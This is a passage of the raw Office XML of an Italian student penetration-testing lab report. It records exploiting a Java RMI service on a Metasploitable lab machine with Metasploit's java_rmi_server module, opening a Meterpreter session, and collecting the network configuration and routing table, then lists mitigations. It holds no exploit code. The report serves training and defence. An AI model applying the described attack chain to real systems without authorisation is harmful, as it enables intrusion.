            <w:tcW w:w="2200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="6d28d9"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000095">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Genmask</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="100001000000"/>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="6d28d9"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000096">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Flags</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="100010000000"/>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="6d28d9"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000097">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Iface</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000098">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>192.168.11.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000001000000"/>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00000099">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>0.0.0.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0000009A">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>255.255.255.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000001000000"/>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0000009B">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>U</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0000009C">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>eth0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="edeaf5"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0000009D">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>0.0.0.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000001000000"/>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="edeaf5"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0000009E">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>192.168.11.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="edeaf5"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0000009F">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>0.0.0.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000001000000"/>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="edeaf5"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="000000A0">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>UG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000"/>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="edeaf5"/>
            <w:tcMar>
              <w:top w:w="50" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="50" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="000000A1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>eth0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="000000A2">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="276"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>La prima rotta (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>flag U</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) indica che la rete locale </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>192.168.11.0/24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> è raggiungibile direttamente tramite l'interfaccia eth0. La seconda rotta (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>flag UG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) è la </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>rotta di default</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: tutto il traffico non destinato alla rete locale viene inoltrato al gateway </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>192.168.11.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Queste informazioni descrivono con precisione il posizionamento di rete della macchina compromessa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000A3">
      <w:pPr>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="57150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4"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5715000" cy="3714750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000A4">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="220" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Fig. 7 — Post-exploitation: da una shell di sistema sulla macchina compromessa si raccolgono la configurazione di rete (ifconfig) e la tabella di routing (route -n), evidenze richieste dalla traccia.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000A5">
      <w:r>
        <w:rPr/>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000A6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="320" w:beforeAutospacing="0" w:after="140" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="6d28d9"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>7. Conclusioni</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000A7">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="276"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>L'esercizio è stato completato con successo, raggiungendo tutti gli obiettivi previsti dalla traccia. È stato dimostrato l'intero ciclo di un attacco a un servizio Java RMI vulnerabile, dalla ricognizione iniziale fino alla post-exploitation. In sintesi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>le macchine sono state configurate con gli indirizzi IP richiesti (Kali 192.168.11.111, Metasploitable 192.168.11.112) e la connettività è stata verificata;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>la scansione Nmap ha confermato la porta 1099/TCP aperta con servizio Java RMI;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000AA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>il modulo Metasploit java_rmi_server ha sfruttato con successo la vulnerabilità, aprendo una sessione Meterpreter sulla macchina remota;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sono state raccolte le due evidenze richieste: configurazione di rete (ifconfig) e tabella di routing (route -n).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000AC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="220" w:beforeAutospacing="0" w:after="100" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1e1b2e"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7.1 Considerazioni di sicurezza e mitigazioni</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000AD">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="276"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>La vulnerabilità sfruttata deriva dalla configurazione insicura del registro Java RMI, che consente il caricamento remoto di classi arbitrarie. Le principali contromisure sono:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>disabilitare il class loading remoto e configurare un Security Manager con policy restrittive;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>esporre il servizio RMI solo su interfacce di rete fidate, limitando l'accesso tramite firewall;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>aggiornare la JVM e le librerie all'ultima versione supportata;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="0" w:after="60" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="off"/>
          <w:bCs w:val="off"/>
          <w:i w:val="off"/>
          <w:iCs w:val="off"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>adottare, ove possibile, alternative più moderne e sicure alla comunicazione RMI legacy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000000B2">
      <w:pPr>
        <w:spacing w:beforeAutospacing="0" w:after="200" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="000000B3">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="6d28d9" w:sz="6" w:space="0"/>
        </w:pBdr>
        <w:spacing w:before="200" w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:sectPr>
      <w:headerReference w:type="default" r:id="rId25"/>
      <w:footerReference w:type="default" r:id="rId26"/>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p w14:paraId="000000B5">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:color="d9d2f0" w:sz="4" w:space="0"/>
      </w:pBdr>
      <w:jc w:val="center"/>
      <w:rPr/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="444444"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">Pagina </w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText xml:space="preserve">PAGE</w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="444444"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="444444"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve"> di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p w14:paraId="000000B4">
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:color="d9d2f0" w:sz="4" w:space="0"/>
      </w:pBdr>
      <w:rPr/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="6d28d9"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t>EPICODE</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="444444"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">   |   Relazione Progetto S7/L5 — Penetration Testing con Metasploit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460" w:hanging="260"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="–"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="92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Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="1a1a1a"/>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6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.jpeg"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.jpeg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.jpeg"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.jpeg"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.jpeg"/><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header" Target="header1.xml"/><Relationship Id="rId26"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Francesco Terraciano</cp:lastModifiedBy>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>